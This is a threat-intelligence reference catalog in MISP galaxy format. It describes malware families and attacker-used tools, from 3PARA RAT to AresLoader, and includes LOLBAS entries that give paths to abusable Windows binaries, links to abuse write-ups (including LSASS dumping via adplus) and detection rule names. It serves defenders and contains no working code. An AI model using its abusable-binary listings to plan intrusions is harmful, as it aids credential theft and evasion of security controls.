Tidal Software
Tidal Software Cluster
Authors
Authors and/or Contributors |
---|
Tidal Cyber |
3PARA RAT
3PARA RAT is a remote access tool (RAT) programmed in C++ that has been used by Putter Panda. [CrowdStrike Putter Panda]
Internal MISP references
UUID 71d76208-c465-4447-8d6e-c54f142b65a4, which can be used as a unique global reference for 3PARA RAT in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0066 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
4H RAT
4H RAT is malware that has been used by Putter Panda since at least 2007. [CrowdStrike Putter Panda]
Internal MISP references
UUID a15142a3-4797-4fef-8ec6-065e3322a69b, which can be used as a unique global reference for 4H RAT in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0065 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
7-Zip
7-Zip is a tool used to compress files into an archive.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 4665e52b-3c5c-4a7f-9432-c89ef26f2c93, which can be used as a unique global reference for 7-Zip in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5023 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c45ce044-b5b9-426a-866c-130e9f2a4427', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
8Base Ransomware
The 8Base ransomware operation began claiming significant numbers of victims on its data leak site in June 2023, including organizations in a range of sectors. Researchers have observed considerable similarities between aspects of 8Base's operations and those of other ransomware groups, leading them to suspect that 8Base may be an evolution or offshoot of existing operations. The language in 8Base's ransom notes is similar to the language seen in RansomHouse's notes, and there is strong overlap between the code of Phobos ransomware and 8Base.[VMWare 8Base June 28 2023][Acronis 8Base July 17 2023]
Internal MISP references
UUID 88a5435f-5586-4cb4-a9c0-1961ee060a67, which can be used as a unique global reference for 8Base Ransomware in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5299 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AADInternals
AADInternals is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.[AADInternals Github][AADInternals Documentation]
Internal MISP references
UUID 3d33fbf5-c21e-4587-ba31-9aeec3cc10c0, which can be used as a unique global reference for AADInternals in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Azure AD', 'Office 365', 'Windows'] |
software_attack_id | S0677 |
source | MITRE |
tags | ['c9c73000-30a5-4a16-8c8b-79169f9c24aa', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ABK
ABK is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 394cadd0-bc4d-4181-ac53-858e84b8e3de, which can be used as a unique global reference for ABK in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0469 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AccCheckConsole
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Verifies UI accessibility requirements
Author: bohops
Paths:
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm\AccChecker\AccCheckConsole.exe
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm64\AccChecker\AccCheckConsole.exe
Resources:
* https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340
* https://twitter.com/bohops/status/1477717351017680899
Detection:
* Sigma: proc_creation_win_lolbin_susp_acccheckconsole.yml
* IOC: Sysmon Event ID 1 - Process Creation
* Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340
[AccCheckConsole.exe - LOLBAS Project]
Internal MISP references
UUID cce705c7-49f8-4b54-b854-fd4b3a32e6ff, which can be used as a unique global reference for AccCheckConsole in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5203 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
AccountRestore
AccountRestore is a .NET executable that is used to brute force Active Directory accounts. The tool searches for a list of specific users and attempts to brute force the accounts based on a password file provided by the user.[Security Joes Sockbot March 09 2022]
Internal MISP references
UUID 6bc29df2-195e-410c-ad08-f3661575492f, which can be used as a unique global reference for AccountRestore in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5059 |
source | Tidal Cyber |
tags | ['dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AcidRain
AcidRain is an ELF binary targeting modems and routers using MIPS architecture.[AcidRain JAGS 2022] AcidRain is associated with the ViaSat KA-SAT communication outage that took place during the initial phases of the 2022 full-scale invasion of Ukraine. Analysis indicates overlap with another network device-targeting malware, VPNFilter, associated with Sandworm Team.[AcidRain JAGS 2022] US and European government sources linked AcidRain to Russian government entities, while Ukrainian government sources linked AcidRain specifically to Sandworm Team.[AcidRain State Department 2022][Vincens AcidPour 2024]
Internal MISP references
UUID cf465790-3d6d-5767-bb8c-63a429f95d83, which can be used as a unique global reference for AcidRain in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1125 |
source | MITRE |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Action RAT
Action RAT is a remote access tool written in Delphi that has been used by SideCopy since at least December 2021 against Indian and Afghani government personnel.[MalwareBytes SideCopy Dec 2021]
Internal MISP references
UUID 202781a3-d481-4984-9e5a-31caafc20135, which can be used as a unique global reference for Action RAT in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1028 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
adbupd
adbupd is a backdoor used by PLATINUM that is similar to Dipsind. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID f52e759a-a725-4b50-84f2-12bef89d369e, which can be used as a unique global reference for adbupd in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0202 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AddinUtil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: .NET Tool used for updating cache files for Microsoft Office Add-Ins.
Author: Michael McKinley @MckinleyMike
Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
Resources:
* https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Detection:
* Sigma: proc_creation_win_addinutil_suspicious_cmdline.yml
* Sigma: proc_creation_win_addinutil_uncommon_child_process.yml
* Sigma: proc_creation_win_addinutil_uncommon_cmdline.yml
* Sigma: proc_creation_win_addinutil_uncommon_dir_exec.yml
[AddinUtil.exe - LOLBAS Project]
Internal MISP references
UUID 253f97c3-ba35-4064-8ec0-892872432214, which can be used as a unique global reference for AddinUtil in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5082 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
AdFind
AdFind is a free command-line query tool that can be used for gathering information from Active Directory.[Red Canary Hospital Thwarted Ryuk October 2020][FireEye FIN6 Apr 2019][FireEye Ryuk and Trickbot January 2019]
Internal MISP references
UUID 70559096-2a6b-4388-97e6-c2b16f3be78e, which can be used as a unique global reference for AdFind in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0552 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '3a633b73-9c2c-4293-8577-fb97be0cda37', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
adplus
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Paths:
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
Resources:
* https://mrd0x.com/adplus-debugging-tool-lsass-dump/
* https://twitter.com/nas_bench/status/1534916659676422152
* https://twitter.com/nas_bench/status/1534915321856917506
Detection:
* Sigma: proc_creation_win_lolbin_adplus.yml
* IOC: As a Windows SDK binary, execution on a system may be suspicious
[adplus.exe - LOLBAS Project]
Internal MISP references
UUID 3f229fe8-4d03-48ba-97b5-d7132510e090, which can be used as a unique global reference for adplus in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5204 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ADRecon
ADRecon is an open-source tool that can be used to gather a "holistic" view of a target Active Directory environment.[GitHub ADRecon]
Internal MISP references
UUID c227bea1-9996-49d6-97ca-10a2fc156747, which can be used as a unique global reference for ADRecon in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5270 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advanced IP Scanner
Advanced IP Scanner is a tool used to perform network scans and show network devices.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID ff0af6fd-e4a1-47c9-b4a1-7ce5074e089e, which can be used as a unique global reference for Advanced IP Scanner in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5024 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advanced Port Scanner
Advanced Port Scanner is a tool used to perform network scans.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID f93b54cf-a17c-4739-a7af-4106055f868d, which can be used as a unique global reference for Advanced Port Scanner in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5006 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
AdvancedRun
AdvancedRun is a tool used to enable software execution under user-defined settings.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 7ef15943-8061-4941-b14e-9634c0b95d28, which can be used as a unique global reference for AdvancedRun in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5025 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '7de7d799-f836-4555-97a4-0db776eb6932', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advpack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Utility for installing software and drivers with rundll32.exe
Author: LOLBAS Team
Paths:
* c:\windows\system32\advpack.dll
* c:\windows\syswow64\advpack.dll
Resources:
* https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
* https://twitter.com/ItsReallyNick/status/967859147977850880
* https://twitter.com/bohops/status/974497123101179904
* https://twitter.com/moriarty_meng/status/977848311603380224
Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: detect_rundll32_application_control_bypass___advpack.yml
[Advpack.dll - LOLBAS Project]
Internal MISP references
UUID 6c82fc65-864a-4a8c-80ed-80a69920c44f, which can be used as a unique global reference for Advpack in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5187 |
source | Tidal Cyber |
tags | ['7a457caf-c3b6-4a48-84cf-c1f50a2eda27', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ADVSTORESHELL
ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. [Kaspersky Sofacy] [ESET Sednit Part 2]
Internal MISP references
UUID ef7f4f5f-6f30-4059-87d1-cd8375bf1bee, which can be used as a unique global reference for ADVSTORESHELL in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0045 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635', '16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Agent.btz
Agent.btz is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. [Securelist Agent.btz]
Internal MISP references
UUID f27c9a91-c618-40c6-837d-089ba4d80f45, which can be used as a unique global reference for Agent.btz in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0092 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
AgentExecutor
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Intune Management Extension included on Intune Managed Devices
Author: Eleftherios Panos
Paths:
* C:\Program Files (x86)\Microsoft Intune Management Extension
Resources:
Detection:
* Sigma: proc_creation_win_lolbin_agentexecutor.yml
* Sigma: proc_creation_win_lolbin_agentexecutor_susp_usage.yml
[AgentExecutor.exe - LOLBAS Project]
Internal MISP references
UUID 27fa7573-c1d3-4857-8a45-ef501c8ea32c, which can be used as a unique global reference for AgentExecutor in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5205 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Agent Tesla
Agent Tesla is a spyware Trojan written for the .NET framework that has been observed since at least 2014.[Fortinet Agent Tesla April 2018][Bitdefender Agent Tesla April 2020][Malwarebytes Agent Tesla April 2020]
Internal MISP references
UUID 304650b1-a0b5-460c-9210-23a5b53815a4, which can be used as a unique global reference for Agent Tesla in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0331 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Akira
Akira ransomware, written in C++, is most prominently (but not exclusively) associated with the ransomware-as-a-service entity Akira.[Kersten Akira 2023]
Internal MISP references
UUID 96ae0e1e-975a-5e11-adbe-c79ee17cee11, which can be used as a unique global reference for Akira in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1129 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '562e535e-19f5-4d6c-81ed-ce2aec544f09'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Akira Ransomware
A ransomware binary designed to encrypt victim files. More details about the TTPs typically observed during Akira ransomware attacks can be found in the associated Group object, "Akira Ransomware Actors".
Internal MISP references
UUID 59d598a9-e115-4d90-8fef-096015afa8d4, which can be used as a unique global reference for Akira Ransomware in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5280 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '562e535e-19f5-4d6c-81ed-ce2aec544f09'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Amadey
Amadey is a Trojan bot that has been used since at least October 2018.[Korean FSI TA505 2020][BlackBerry Amadey 2020]
Internal MISP references
UUID f173ec20-ef40-436b-a859-fef017e1e767, which can be used as a unique global reference for Amadey in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1025 |
source | MITRE |
tags | ['fa84181d-fd9a-4c7b-8e18-e47011993b5e', '263adb48-051c-4384-90cf-1d4c937c3f05', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Anchor
Anchor is one of a family of backdoor malware that has been used in conjunction with TrickBot on selected high-profile targets since at least 2018.[Cyberreason Anchor December 2019][Medium Anchor DNS July 2020]
Internal MISP references
UUID 9521c535-1043-4b82-ba5d-e5eaeca500ee, which can be used as a unique global reference for Anchor in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0504 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ANDROMEDA
ANDROMEDA is commodity malware that was widespread in the early 2010s and continues to be observed in infections across a wide variety of industries. During the 2022 C0026 campaign, threat actors re-registered expired ANDROMEDA C2 domains to spread malware to select targets in Ukraine.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID 69aac793-9e6a-5167-bc62-823189ee2f7b, which can be used as a unique global reference for ANDROMEDA in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1074 |
source | MITRE |
type | ['malware'] |
Angry IP Scanner
Angry IP Scanner is a tool that adversaries are known to use to search for vulnerable RDP ports.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID 8efa90ac-a894-467d-8633-16a44d270358, which can be used as a unique global reference for Angry IP Scanner in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S5274 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
AnyDesk
AnyDesk is a tool used to enable remote connections to network devices.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 922447fd-f41e-4bcf-b479-88137c81099c, which can be used as a unique global reference for AnyDesk in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5007 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'fb06d216-f535-45c1-993a-8c1b7aa2111c', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
AppInstaller
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool used for installation of AppX/MSIX applications on Windows 10
Author: Wade Hickey
Paths:
* C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Resources:
* https://twitter.com/notwhickey/status/1333900137232523264
Detection:
* Sigma: dns_query_win_lolbin_appinstaller.yml
[AppInstaller.exe - LOLBAS Project]
Internal MISP references
UUID 9fa7c759-172f-4ae3-ac3d-0070c3c4c439, which can be used as a unique global reference for AppInstaller in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5083 |
source | Tidal Cyber |
tags | ['837cf289-ad09-48ca-adf9-b46b07015666', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
AppleJeus
AppleJeus is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. AppleJeus has been used by Lazarus Group, targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. AppleJeus has been used to distribute the FALLCHILL RAT.[CISA AppleJeus Feb 2021]
Internal MISP references
UUID cdeb3110-07e5-4c3d-9eef-e6f2b760ef33, which can be used as a unique global reference for AppleJeus in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Windows'] |
software_attack_id | S0584 |
source | MITRE |
tags | ['8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AppleSeed
AppleSeed is a backdoor that has been used by Kimsuky to target South Korean government, academic, and commercial targets since at least 2021.[Malwarebytes Kimsuky June 2021]
Internal MISP references
UUID 9df2e42e-b454-46ea-b50d-2f7d999f3d42, which can be used as a unique global reference for AppleSeed in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Android', 'Windows'] |
software_attack_id | S0622 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Appvlp
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: Oddvar Moe
Paths:
* C:\Program Files\Microsoft Office\root\client\appvlp.exe
* C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Resources:
* https://github.com/MoooKitty/Code-Execution
* https://twitter.com/moo_hax/status/892388990686347264
* https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
* https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
Detection:
* Sigma: proc_creation_win_lolbin_appvlp.yml
[Appvlp.exe - LOLBAS Project]
Internal MISP references
UUID 1328ae5d-7220-46bb-a7ee-0c5a31eeda7f, which can be used as a unique global reference for Appvlp in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5206 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
AresLoader
AresLoader is a loader malware distributed as malware-as-a-service. It has been observed being both dropped by and delivering SystemBC, a known ransomware precursor.[New loader on the bloc - AresLoader | Intel471]
Internal MISP references
UUID 5bf1ed41-8fe5-4c4b-8d80-a55980289e1f, which can be used as a unique global reference for AresLoader in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5286 |
source | Tidal Cyber |
